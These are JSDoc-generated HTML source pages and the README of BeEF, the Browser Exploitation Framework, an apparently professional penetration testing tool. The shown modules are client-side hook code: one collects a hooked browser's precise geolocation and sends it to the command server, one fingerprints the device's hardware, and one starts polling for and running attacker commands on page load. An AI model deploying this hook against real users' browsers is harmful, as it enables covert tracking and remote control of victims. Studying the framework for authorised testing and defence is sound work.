<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/encode_json.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: encode/json.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: encode/json.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
* @namespace beef.encode.json
*/
beef.encode.json = {
/**
* @memberof beef.encode.json
* @param o
*/
stringify: function(o) {
if (typeof(JSON) == 'object' && JSON.stringify) {
// Error on stringifying cylcic structures caused polling to die
try {
s = JSON.stringify(o);
} catch(error) {
// TODO log error / handle cyclic structures?
}
return s;
}
var type = typeof(o);
if (o === null)
return "null";
if (type == "undefined")
return '\"\"';
if (type == "number" || type == "boolean")
return o + "";
if (type == "string")
return $j.quoteString(o);
if (type == 'object')
{
if (typeof o.toJSON == "function")
return $j.toJSON( o.toJSON() );
if (o.constructor === Date)
{
var month = o.getUTCMonth() + 1;
if (month < 10) month = '0' + month;
var day = o.getUTCDate();
if (day < 10) day = '0' + day;
var year = o.getUTCFullYear();
var hours = o.getUTCHours();
if (hours < 10) hours = '0' + hours;
var minutes = o.getUTCMinutes();
if (minutes < 10) minutes = '0' + minutes;
var seconds = o.getUTCSeconds();
if (seconds < 10) seconds = '0' + seconds;
var milli = o.getUTCMilliseconds();
if (milli < 100) milli = '0' + milli;
if (milli < 10) milli = '0' + milli;
return '"' + year + '-' + month + '-' + day + 'T' +
hours + ':' + minutes + ':' + seconds +
'.' + milli + 'Z"';
}
if (o.constructor === Array)
{
var ret = [];
for (var i = 0; i < o.length; i++)
ret.push( $j.toJSON(o[i]) || "null" );
return "[" + ret.join(",") + "]";
}
var pairs = [];
for (var k in o) {
var name;
var type = typeof k;
if (type == "number")
name = '"' + k + '"';
else if (type == "string")
name = $j.quoteString(k);
else
continue; //skip non-string or number keys
if (typeof o[k] == "function")
continue; //skip pairs where the value is a function.
var val = $j.toJSON(o[k]);
pairs.push(name + ":" + val);
}
return "{" + pairs.join(", ") + "}";
}
},
/**
* @memberof beef.encode.json
* @param string
*/
quoteString: function(string) {
if (string.match(this._escapeable))
{
return '"' + string.replace(this._escapeable, function (a)
{
var c = this._meta[a];
if (typeof c === 'string') return c;
c = a.charCodeAt();
return '\\u00' + Math.floor(c / 16).toString(16) + (c % 16).toString(16);
}) + '"';
}
return '"' + string + '"';
},
_escapeable: /["\\\x00-\x1f\x7f-\x9f]/g,
_meta : {
'\b': '\\b',
'\t': '\\t',
'\n': '\\n',
'\f': '\\f',
'\r': '\\r',
'"' : '\\"',
'\\': '\\\\'
}
};
$j.toJSON = function(o) {return beef.encode.json.stringify(o);};
$j.quoteString = function(o) {return beef.encode.json.quoteString(o);};
beef.regCmp('beef.encode.json');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/geolocation.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: geolocation.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: geolocation.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides functionalities to use the geolocation API.
* @namespace beef.geolocation
*/
beef.geolocation = {
/**
* Check if browser supports the geolocation API
* @return {boolean}
*/
isGeolocationEnabled: function(){
return !!navigator.geolocation;
},
/**
* Given latitude/longitude retrieves exact street position of the zombie
* @param command_url
* @param command_id
* @param latitude
* @param longitude
*/
getOpenStreetMapAddress: function(command_url, command_id, latitude, longitude){
// fixes damned issues with jquery 1.5, like this one:
// http://bugs.jquery.com/ticket/8084
$j.ajaxSetup({
jsonp: null,
jsonpCallback: null
});
$j.ajax({
error: function(xhr, status, error){
beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
+ "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True");
},
success: function(data, status, xhr){
beef.debug("[geolocation.js] openstreetmap success");
//var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
// + "&osm=" + encodeURI(jsonResp.display_name)
+ "&osm=" + data.display_name
+ "&geoLocEnabled=True");
},
type: "get",
dataType: "json",
url: "https://nominatim.openstreetmap.org/reverse?format=jsonv2&lat=" +
latitude + "&lon=" + longitude + "&zoom=18&addressdetails=1"
});
},
/**
* Retrieve latitude/longitude using the geolocation API
* @param command_url
* @param command_id
*/
getGeolocation: function (command_url, command_id){
if (!navigator.geolocation) {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return;
}
beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:
beef.net.send(command_url, command_id, "latitude=UNKNOWN_ERROR&longitude=UNKNOWN_ERROR&geoLocEnabled=False");
return;
case 1:
beef.net.send(command_url, command_id, "latitude=PERMISSION_DENIED&longitude=PERMISSION_DENIED&geoLocEnabled=False");
return;
case 2:
beef.net.send(command_url, command_id, "latitude=POSITION_UNAVAILABLE&longitude=POSITION_UNAVAILABLE&geoLocEnabled=False");
return;
case 3:
beef.net.send(command_url, command_id, "latitude=TIMEOUT&longitude=TIMEOUT&geoLocEnabled=False");
return;
}
beef.net.send(command_url, command_id, "latitude=UNKNOWN_ERROR&longitude=UNKNOWN_ERROR&geoLocEnabled=False");
},
{enableHighAccuracy:true, maximumAge:30000, timeout:27000}
);
}
}
beef.regCmp('beef.geolocation');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/hardware.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: hardware.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: hardware.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* @namespace beef.hardware
*/
beef.hardware = {
ua: navigator.userAgent,
/**
* @return {String} CPU type
*/
getCpuArch: function() {
var arch = 'UNKNOWN';
// note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
// in detecting the OS arch rather than the browser build
if (navigator.userAgent.match('(WOW64|x64|x86_64)') || navigator.platform.toLowerCase() == "win64"){
arch = 'x86_64';
}else if(typeof navigator.cpuClass != 'undefined'){
switch (navigator.cpuClass) {
case '68K':
arch = 'Motorola 68K';
break;
case 'PPC':
arch = 'Motorola PPC';
break;
case 'Digital':
arch = 'Alpha';
break;
default:
arch = 'x86';
}
}
// TODO we can infer the OS is 64 bit, if we first detect the OS type (os.js).
// For example, if OSX is at least 10.7, most certainly is 64 bit.
return arch;
},
/**
* Returns number of CPU cores
* @return {String}
*/
getCpuCores: function() {
var cores = 'unknown';
try {
if(typeof navigator.hardwareConcurrency != 'undefined') {
cores = navigator.hardwareConcurrency;
}
} catch(e) {
cores = 'unknown';
}
return cores;
},
/**
* Returns CPU details
* @return {String}
*/
getCpuDetails: function() {
return {
arch: beef.hardware.getCpuArch(),
cores: beef.hardware.getCpuCores()
}
},
/**
* Returns GPU details
* @return {object}
*/
getGpuDetails: function() {
var gpu = 'unknown';
var vendor = 'unknown';
// use canvas technique:
// https://github.com/Valve/fingerprintjs2
// http://codeflow.org/entries/2016/feb/10/webgl_debug_renderer_info-extension-survey-results/
try {
var getWebglCanvas = function () {
var canvas = document.createElement('canvas')
var gl = null
try {
gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl')
} catch (e) { }
if (!gl) { gl = null }
return gl;
}
var glContext = getWebglCanvas();
var extensionDebugRendererInfo = glContext.getExtension('WEBGL_debug_renderer_info');
var gpu = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_RENDERER_WEBGL);
var vendor = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_VENDOR_WEBGL);
beef.debug("GPU: " + gpu + " - Vendor: " + vendor);
} catch (e) {
beef.debug('Failed to detect WebGL renderer: ' + e.toString());
}
return {
gpu: gpu,
vendor: vendor
}
},
/**
* Returns RAM (GiB)
* @return {String}
*/
getMemory: function() {
var memory = 'unknown';
try {
if(typeof navigator.deviceMemory != 'undefined') {
memory = navigator.deviceMemory;
}
} catch(e) {
memory = 'unknown';
}
return memory;
},
/**
* Returns battery details
* @return {Object}
*/
getBatteryDetails: function() {
var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery;
if (!!battery) {
return {
chargingStatus: battery.charging,
batteryLevel: battery.level * 100 + "%",
chargingTime: battery.chargingTime,
dischargingTime: battery.dischargingTime
}
} else {
return {
chargingStatus: 'unknown',
batteryLevel: 'unknown',
chargingTime: 'unknown',
dischargingTime: 'unknown'
}
}
},
/**
* Returns zombie screen size and color depth.
* @return {Object}
*/
getScreenSize: function () {
return {
width: window.screen.width,
height: window.screen.height,
colordepth: window.screen.colorDepth
}
},
/**
* Is touch enabled?
* @return {Boolean} true or false.
*/
isTouchEnabled: function() {
if ('ontouchstart' in document) return true;
return false;
},
/**
* Is virtual machine?
* @return {Boolean} true or false.
*/
isVirtualMachine: function() {
if (this.getGpuDetails().vendor.match('VMware, Inc'))
return true;
if (this.isMobileDevice())
return false;
// if the screen resolution is uneven, and it's not a known mobile device
// then it's probably a VM
if (screen.width % 2 || screen.height % 2)
return true;
return false;
},
/**
* Is a Laptop?
* @return {Boolean} true or false.
*/
isLaptop: function() {
if (this.isMobileDevice()) return false;
// Most common laptop screen resolution
if (screen.width == 1366 && screen.height == 768) return true;
// Netbooks
if (screen.width == 1024 && screen.height == 600) return true;
return false;
},
/**
* Is Nokia?
* @return {Boolean} true or false.
*/
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)|(Lumia )')) ? true : false;
},
/**
* Is Zune?
* @return {Boolean} true or false.
*/
isZune: function() {
return (this.ua.match('ZuneWP7')) ? true : false;
},
/**
* Is HTC?
* @return {Boolean} true or false.
*/
isHtc: function() {
return (this.ua.match('HTC')) ? true : false;
},
/**
* Is Ericsson?
* @return {Boolean} true or false.
*/
isEricsson: function() {
return (this.ua.match('Ericsson')) ? true : false;
},
/**
* Is Motorola?
* @return {Boolean} true or false.
*/
isMotorola: function() {
return (this.ua.match('Motorola')) ? true : false;
},
/**
* Is Google?
* @return {Boolean} true or false.
*/
isGoogle: function() {
return (this.ua.match('Nexus One')) ? true : false;
},
/**
* Returns true if the browser is on a Mobile device
* @return {Boolean} true or false
*
* @example: if(beef.hardware.isMobileDevice()) { ... }
*/
isMobileDevice: function() {
return MobileEsp.DetectMobileQuick();
},
/**
* Returns true if the browser is on a game console
* @return {Boolean} true or false
*
* @example: if(beef.hardware.isGameConsole()) { ... }
*/
isGameConsole: function() {
return MobileEsp.DetectGameConsole();
},
getName: function() {
var ua = navigator.userAgent.toLowerCase();
if(MobileEsp.DetectIphone()) { return "iPhone"};
if(MobileEsp.DetectIpod()) { return "iPod Touch"};
if(MobileEsp.DetectIpad()) { return "iPad"};
if (this.isHtc()) { return 'HTC'};
if (this.isMotorola()) { return 'Motorola'};
if (this.isZune()) { return 'Zune'};
if (this.isGoogle()) { return 'Google Nexus One'};
if (this.isEricsson()) { return 'Ericsson'};
if(MobileEsp.DetectAndroidPhone()) { return "Android Phone"};
if(MobileEsp.DetectAndroidTablet()) { return "Android Tablet"};
if(MobileEsp.DetectS60OssBrowser()) { return "Nokia S60 Open Source"};
if(ua.search(MobileEsp.deviceS60) > -1) { return "Nokia S60"};
if(ua.search(MobileEsp.deviceS70) > -1) { return "Nokia S70"};
if(ua.search(MobileEsp.deviceS80) > -1) { return "Nokia S80"};
if(ua.search(MobileEsp.deviceS90) > -1) { return "Nokia S90"};
if(ua.search(MobileEsp.deviceSymbian) > -1) { return "Nokia Symbian"};
if (this.isNokia()) { return 'Nokia'};
if(MobileEsp.DetectWindowsPhone7()) { return "Windows Phone 7"};
if(MobileEsp.DetectWindowsPhone8()) { return "Windows Phone 8"};
if(MobileEsp.DetectWindowsPhone10()) { return "Windows Phone 10"};
if(MobileEsp.DetectWindowsMobile()) { return "Windows Mobile"};
if(MobileEsp.DetectBlackBerryTablet()) { return "BlackBerry Tablet"};
if(MobileEsp.DetectBlackBerryWebKit()) { return "BlackBerry OS 6"};
if(MobileEsp.DetectBlackBerryTouch()) { return "BlackBerry Touch"};
if(MobileEsp.DetectBlackBerryHigh()) { return "BlackBerry OS 5"};
if(MobileEsp.DetectBlackBerry()) { return "BlackBerry"};
if(MobileEsp.DetectPalmOS()) { return "Palm OS"};
if(MobileEsp.DetectPalmWebOS()) { return "Palm Web OS"};
if(MobileEsp.DetectGarminNuvifone()) { return "Gamin Nuvifone"};
if(MobileEsp.DetectArchos()) { return "Archos"}
if(MobileEsp.DetectBrewDevice()) { return "Brew"};
if(MobileEsp.DetectDangerHiptop()) { return "Danger Hiptop"};
if(MobileEsp.DetectMaemoTablet()) { return "Maemo Tablet"};
if(MobileEsp.DetectSonyMylo()) { return "Sony Mylo"};
if(MobileEsp.DetectAmazonSilk()) { return "Kindle Fire"};
if(MobileEsp.DetectKindle()) { return "Kindle"};
if(MobileEsp.DetectSonyPlaystation()) { return "Playstation"};
if(ua.search(MobileEsp.deviceNintendoDs) > -1) { return "Nintendo DS"};
if(ua.search(MobileEsp.deviceWii) > -1) { return "Nintendo Wii"};
if(ua.search(MobileEsp.deviceNintendo) > -1) { return "Nintendo"};
if(MobileEsp.DetectXbox()) { return "Xbox"};
if(this.isLaptop()) { return "Laptop"};
if(this.isVirtualMachine()) { return "Virtual Machine"};
return 'Unknown';
}
};
beef.regCmp('beef.hardware');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/index.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Home</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Home</h1>
<h3> </h3>
<section>
<article><p>===============================================================================</p>
<pre><code>Copyright (c) 2006-2023 Wade Alcorn - [email protected]
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
</code></pre>
<p>===============================================================================</p>
<h2>What is BeEF?</h2>
<p><strong>BeEF</strong> is short for <strong>The Browser Exploitation Framework</strong>. It is a penetration testing tool that focuses on the web browser.</p>
<p>Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.</p>
<h2>Get Involved</h2>
<p>You can get in touch with the BeEF team. Just check out the following:</p>
<p><strong>Please, send us pull requests!</strong></p>
<p><strong>Web:</strong> https://beefproject.com/</p>
<p><strong>Bugs:</strong> https://github.com/beefproject/beef/issues</p>
<p><strong>Security Bugs:</strong> [email protected]</p>
<p><strong>IRC:</strong> ircs://irc.freenode.net/beefproject</p>
<p><strong>Twitter:</strong> @beefproject</p>
<h2>Requirements</h2>
<ul>
<li>Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.</li>
<li><a href="http://ruby-lang.org">Ruby</a>: 2.5 or newer</li>
<li><a href="http://sqlite.org">SQLite</a>: 3.x</li>
<li><a href="https://nodejs.org">Node.js</a>: 6 or newer</li>
<li>The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile</li>
<li>Selenium is required on OSX: brew install selenium-server-standalone (See https://github.com/shvets/selenium)</li>
</ul>
<h2>Quick Start</h2>
<p><strong>The following is for the impatient.</strong></p>
<p>The <code>install</code> script installs the required operating system packages and all the prerequisite Ruby gems:</p>
<pre class="prettyprint source"><code>$ ./install
</code></pre>
<p>For full installation details, please refer to <a href="https://github.com/beefproject/beef/blob/master/INSTALL.txt">INSTALL.txt</a>.</p>
<p>We also have an <a href="https://github.com/beefproject/beef/wiki/Installation">Installation</a> page on the wiki.</p>
<p>Upon successful installation, be sure to read the <a href="https://github.com/beefproject/beef/wiki/Configuration">Configuration</a> page on the wiki for important details on configuring and securing BeEF.</p>
<h2>Usage</h2>
<p>To get started, simply execute beef and follow the instructions:</p>
<pre class="prettyprint source"><code>$ ./beef
</code></pre></article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/init.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: init.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: init.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Contains the beef_init() method which starts the BeEF client-side
* logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
*
* If beef.pageIsLoaded is true, then this JS has been loaded >1 times
* and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again.
*
* @namespace beef.init
*/
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) {
beef.net.browser_details();
}
/**
* @memberof beef.init
*/
window.onload = function () {
beef_init();
};
/**
* @memberof beef.init
*/
window.onpopstate = function (event) {
if (beef.onpopstate.length > 0) {
event.preventDefault;
for (var i = 0; i < beef.onpopstate.length; i++) {
var callback = beef.onpopstate[i];
try {
callback(event);
} catch (e) {
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
}
};
/**
* @memberof beef.init
*/
window.onclose = function (event) {
if (beef.onclose.length > 0) {
event.preventDefault;
for (var i = 0; i < beef.onclose.length; i++) {
var callback = beef.onclose[i];
try {
callback(event);
} catch (e) {
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}
}
};
/**
* Starts the polling mechanism, and initialize various components:
* - browser details (see browser.js) are sent back to the "/init" handler
* - the polling starts (checks for new commands, and execute them)
* - the logger component is initialized (see logger.js)
* - the Autorun Engine is initialized (see are.js)
* @memberof beef.init
*/
function beef_init() {
if (!beef.pageIsLoaded) {
beef.pageIsLoaded = true;
beef.net.browser_details();
if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
setTimeout(function(){
beef.websocket.start();
beef.updater.execute_commands();
beef.logger.start();
}, parseInt(beef.websocket.ws_connect_timeout));
}else {
beef.net.browser_details();
beef.updater.execute_commands();
beef.updater.check();
beef.logger.start();
}
}
}
</code></pre>
</article>
</section>
</div>
<nav>
